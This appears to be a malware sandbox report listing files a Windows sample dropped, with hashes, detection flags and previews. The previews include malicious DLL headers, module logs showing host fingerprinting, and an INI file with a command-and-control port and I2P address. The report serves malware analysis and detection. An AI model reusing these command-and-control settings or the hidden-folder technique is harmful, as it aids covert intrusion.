                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):75382
                                                                                                                                                Entropy (8bit):3.047293772628709
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SzymQDaHLE0U46X/gsm0a/A7Y+V+fYvI+b+X+L+S+f+4+t++vf:SzymQDaHLE0U46X/gsm0a47Y+V+fYvIs
                                                                                                                                                MD5:D4FA58ED702E7BD7F0C4B9581BFD49A8
                                                                                                                                                SHA1:0A3494AC4280F4E7AD34F5C87646414C95EABD8C
                                                                                                                                                SHA-256:8E558A37ABA47BCE3155CBB9B68BD9FB5CCE612BA16465405258BAC53BFEB063
                                                                                                                                                SHA-512:F74FE3CDEA02329657A12D51D7B521181C52D3B0A89364129053340EFB4BE48EF60F228B8B2DA4FF2E9F3948D36F2B11F46A7E89A28568DF1C448CADDEE11B91
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):13340
                                                                                                                                                Entropy (8bit):2.6857470957661005
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:TiZYW14cazPfYtYYYlWiHZYEZl8trie3Sq5wwme/wVa8kjGKMj+WIh/3:2ZDWcGg/Ug2vVa8kjGKMj+Rh/3
                                                                                                                                                MD5:DCE8DBC6879BC76E27C1C555AD120077
                                                                                                                                                SHA1:4EE2F18FAD750A443BE3CC016C5FA6A26492BD4A
                                                                                                                                                SHA-256:D56CFC8E38A0F06DCA95486DC7504DC132707B1FA18C3FA55476C27496CBA54A
                                                                                                                                                SHA-512:BCBA6BE3B5BAD97021F8540157933D467743706C563BDDDA02B2A709C4B27A597D98D2D828E68A3A0D831EC6DDCD75A2C36F5FB79BEB21D449BE1684EA41B7B5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):115712
                                                                                                                                                Entropy (8bit):6.193969228624904
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
                                                                                                                                                MD5:EC9499EE84ED09B77BE0A35EC87B781C
                                                                                                                                                SHA1:4148D40284BAB415DDB828BD4061A4FE93C9AF26
                                                                                                                                                SHA-256:5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
                                                                                                                                                SHA-512:D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: DF2.exe, Detection: malicious
                                                                                                                                                • Filename: ET5.exe, Detection: malicious
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2128
                                                                                                                                                Entropy (8bit):5.404753982480259
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:CFdHW54yclD8cm9FLQIU4bcPPf4bcPPTM94bcPPZ4bcPPy4bcPP84bcPPcWIeF8c:idH9N8J9VL3YPQYPTNYP6YPtYP/YPVHJ
                                                                                                                                                MD5:224F7A7D74F05A46B474AFF900E60DB1
                                                                                                                                                SHA1:8FFA0EFF57434CD49FD39736525EE28614B8B9C7
                                                                                                                                                SHA-256:E73758553E411869FDFEE4A270127A432371033ABFB7EB3E216036179C3A5D59
                                                                                                                                                SHA-512:5936BCEF0E7768A898C7F4A990DCBEBD536D7B1E894F8C2E8C6D22800359FFA4093D6776BA5C209C3214AB70344501A4116D052DAE23C6487DAB2B1A6487E6AD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=9
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:Generic INItialization configuration [cnccli]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):213
                                                                                                                                                Entropy (8bit):5.129024990254676
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
                                                                                                                                                MD5:7D88563AD41BAF4026CFC5D098CBF40D
                                                                                                                                                SHA1:442756834CCCEB84F219F3C762852437FBB3458E
                                                                                                                                                SHA-256:D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
                                                                                                                                                SHA-512:F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):104448
                                                                                                                                                Entropy (8bit):6.236071662185895
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
                                                                                                                                                MD5:CE579A1BDCB9763DAFEBF01AD29F918C
                                                                                                                                                SHA1:F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
                                                                                                                                                SHA-256:0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
                                                                                                                                                SHA-512:EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: DF2.exe, Detection: malicious
                                                                                                                                                • Filename: ET5.exe, Detection: malicious
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1021
                                                                                                                                                Entropy (8bit):5.462313039314351
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:CFAGHS+5lGyclY7GfyABI7cRE9FLxJ8Je0ERAXY0e:CFdHS+54yclD8cm9FLQIOi
                                                                                                                                                MD5:C78D2ABD27A3B256C0425AB4374D0C49
                                                                                                                                                SHA1:F04B5622F4436CD32B52EEFB189412E318B6AD3A
                                                                                                                                                SHA-256:7561E874DF3FC4DD8148BF7A3D3F13BC50D6A7FDFE551A37CF8BC1CA51CEB252
                                                                                                                                                SHA-512:8C223CF890A850D19AF1D128724C43F871299FE302AE6324B20EE965DE43CB620B605D895B08B03B02202E826D2927B4F92F1A9356652FB22FF8F2B0001E3E77
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8bfb51dbd)..[I] (tcp_connect) -> Done(sock=0x384,host=7
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92672
                                                                                                                                                Entropy (8bit):6.229119632298774
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
                                                                                                                                                MD5:7FEA520E80E7A73252F2A5C204BBF820
                                                                                                                                                SHA1:557D33F75805669A6D5E98D0E6CD3B790ECF3464
                                                                                                                                                SHA-256:64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
                                                                                                                                                SHA-512:6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: DF2.exe, Detection: malicious
                                                                                                                                                • Filename: ET5.exe, Detection: malicious
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):44463
                                                                                                                                                Entropy (8bit):5.261321148614135
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ALNOTXTbX3EnIcE39EvhEkuE0kaUNB4eMzP2TApumnYh:kNOTPn5yzDOzPEAMsYh
                                                                                                                                                MD5:43C3CDA4576560A6D28E6A9B3FF959C3
                                                                                                                                                SHA1:67E8111ABBF29287B586CD15ABF8856182AC7103
                                                                                                                                                SHA-256:F8AB3EDE9EC4291E134218622DA2F3665A214B212058A48DBFD081B8B55EA0D7
                                                                                                                                                SHA-512:DED652AC77EBD0018DC27C4B1EA3CC061BB33FFDB55434A6D094C9AC33A517919B9D33E7C3F9A65CDFE45F7847AFA2D5716C1BB0E8BD2B7C53142CBFB10EEFC9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8568
                                                                                                                                                Entropy (8bit):4.958673415285098
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                                                                                                                                MD5:27535CEE6740DFC50A78A0322415E67C
                                                                                                                                                SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                                                                                                                                SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                                                                                                                                SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):75977
                                                                                                                                                Entropy (8bit):7.8696816318811385
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
                                                                                                                                                MD5:E53A179BB45CD7EDD8371740D65076BD
                                                                                                                                                SHA1:6B74034746E12C2058614A9DF671C31B79EAA7E9
                                                                                                                                                SHA-256:C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
                                                                                                                                                SHA-512:767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2*........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..*!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.606056825540447
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:6TELO4RGAwjfyDuJra3T6p7ZdFFphN4yKuWEp2/N6:6TESTzOx+p7Zjx3A/A
                                                                                                                                                MD5:BB7115DCC8A875F5FE525E0BCBB8598E
                                                                                                                                                SHA1:2C6172818B3FE892023C7E4BA7DB452DDEAF5460
                                                                                                                                                SHA-256:0D69E40BDED9B383911AC3D5872191974A95AF3AEF78F67ADC05F2FB3BE55BF2
                                                                                                                                                SHA-512:F64C3DD8DA7F977CA5E285570DC3DD59D28FB95BAE67BBF19A945396527C3C189ABEEFF9560CEF7F61A02B617E16E721F155DE1CD6C1D11845B77FDD186CD7F5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.c.....=.......Yl....b,.?m.}.4O.4.+Au.c.....l_B...j.{.?9..f..uD....U..z..8../e#..n.....`7.p.|....($..J;Q..U4+A.G........_U\...)."..(...ug..m.*l....u.]..H........ lr.\0....[.\..`.......C*.../G.+.>....1..<l6i.P.....?wJ]..G.._....U...C)...]e.z..U#....||EM.?....7..;X..aO..l.I.....iq..}L..U.....0x.w.d......=.).X......{...L...,...W.c>.v....wT.c....?.....uNS.w6......g...J-Rpx.a....[...%....\V.w9.w[.;._..w/M..4.0A.X.![...S..ZM..=..4J.^.e.:.Pkl8.R..r$C...7.R...Z......h.h.\.$.F..Z...5..p..W.Y.r
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.557821836618357
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:SpiPTEJTsq+/EbVJsratqMu3Nhj2FZ+EhKivEY:SQPTEpCe4AIXvEAivl
                                                                                                                                                MD5:D83C021597EEBCE39A95DFF1C978100B
                                                                                                                                                SHA1:64C0BB0741323CB6CE1048A46252316382E79DAB
                                                                                                                                                SHA-256:2935B87EF7E254010083DB699D50F599B4D61D0800AE42D910EDF742B2004AB2
                                                                                                                                                SHA-512:0506658136A793DE61261954DDF2443C9E6AF8413CCE2B58F105FCA171069BB045E9CEABE5502799F230F2EAC0138700D19067B96DC7A7B4C54E2F59A9E87B2E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.k.v.D..w+]..@O.x..P.%...H.]'... b...}vD3../x"3..r.......S..{@5R(...."#...0.h#.....M..d...".=.?`..Lg...)G.P..!@v.'B.+YH....)%[.d...'w|j=..d.c.....8.e..KT....5..1.l..e8....).=.MR&mnzw....x.;R ....n-.|.l._....u+?.a..D.YT%..\..L....M.I.o.....v...v..I.<.QoT-..T...F?...8..&.c.... .-.#.qn).5+...Y...2.;@..d..Z...)}4.....IR...}.S.7K.j$M+^.R.Nu...c..k...!......A.c..<.;S.Q...=(7./g.."..]2c..B.MW#.q...55...Q......7.xl6^._v..^@$L.Z.|...}.dq..f.A[.C..x..m.'.U.0ef/....3..S....._.>......e9..G..
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.587937094214244
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:gMLxkJAdkLPHqf+9A4sdRwOZuL4VeXhf7f2JFvSau+OG:JSKdwfqW9A4Ac9VqJpSaCG
                                                                                                                                                MD5:946780F5391EDFB85103F7861B78C282
                                                                                                                                                SHA1:887C3F962BBC12145850B60989121D18A5FD2438
                                                                                                                                                SHA-256:59FD827654BAE1B69DB59D0D7B3624B78515DF2DCEA153E98403F1424721B302
                                                                                                                                                SHA-512:8E04FF1007D54796B6A5BDAC273B3F9F87999884B3AF7C839A6B5302EFD914145C64185E0164DDFDC386FD1BA0C8C4B1925D56E0AC3393D5EEF0784E02F1EEDB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:....(...n..uj...@.WEFZ.......f......9...".I50...{...v.i..)..?bm..b .....u.!.-99.=J.<...u....[$*....{....0.Z}.m..*........s+DMF...+J...By.......M.^..S....C.....?.l.Rs..m..h^...D..1.$.iv.D..UF..m.3..h~G.T..H{H.>..*..\.T....%|..i.9..ZB.1~x.6.z..W`._/..B.!.....t.....Tfd.).O..{y.?..H..^...#......Y.P9.#.')7...z..K8k..?.|.$PA>..>v.qJ....=6..irD.<t.R.I>..4..w..UD$Rw.....k&(.8.:.Hi/J.I.r..`2.G...b...I7..S/4..H5.97...c=.F............. M.R.7j.c..M!0-.9.F...l..!....s......-..a..U........JFA
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.565338382383913
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:Fx4I7MQFTy/clewppYxzhuI00nYUmgowIFhYTeJwUTj7o1W:4I7MQVy/cppYNbtnwgoHFh+ChTj7o1W
                                                                                                                                                MD5:9694810F5F86A5D5357E28095DB53639
                                                                                                                                                SHA1:B8E1E90A832A73382CC45DDC0E5014A4B59DB612
                                                                                                                                                SHA-256:AE631F9FE96E6C303BC0F424377BF548D9FB44B5D5C2868885CB1D35E77DD472
                                                                                                                                                SHA-512:B76BB6D608D0AC5EF764A4B7208B2448BB54BAEE45FBC3AC07D3196592AA9F85F4DD90B12717058EF468C20EC4856D525830D0F65E14AA08C502D67CC9C8FCE2
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..@.i..)_..oD.WL.l$e..h.....''..J.wlC...._.=...U....\.6$}R47..J..:.:...}...D5.f..GU!..(....;...k."^ ..B.0#.g]..Z.>.V.....Z.Ey.&.3.Hc..].....(K..@...&..M..R....?.@./. ;. %....h.Lu....'...e3.)CK.+.@..GQ.I....K-v.k~c...pl~%...V<B...I..4...U.LxSgB(.s.3......;......'.......#ke.........LCA.I..........`..la.....W..}Z..D..e'....k...T4>?..-.g._.@EOy.nK.].;.d.T...-@6.........o.?}g.P<..7$r.... '.....o.......k.....Z......o.H'............9.-V..y.......X,."...y.....}.e....7+..4`..%.R-.[.j..V...`..n..2
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):80
                                                                                                                                                Entropy (8bit):6.137492001110314
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:yM7FGtnf+3M1mcxGF3JtEiG:Z733Mcb3EiG
                                                                                                                                                MD5:40426B272F5F9746E475BC60587E4AD5
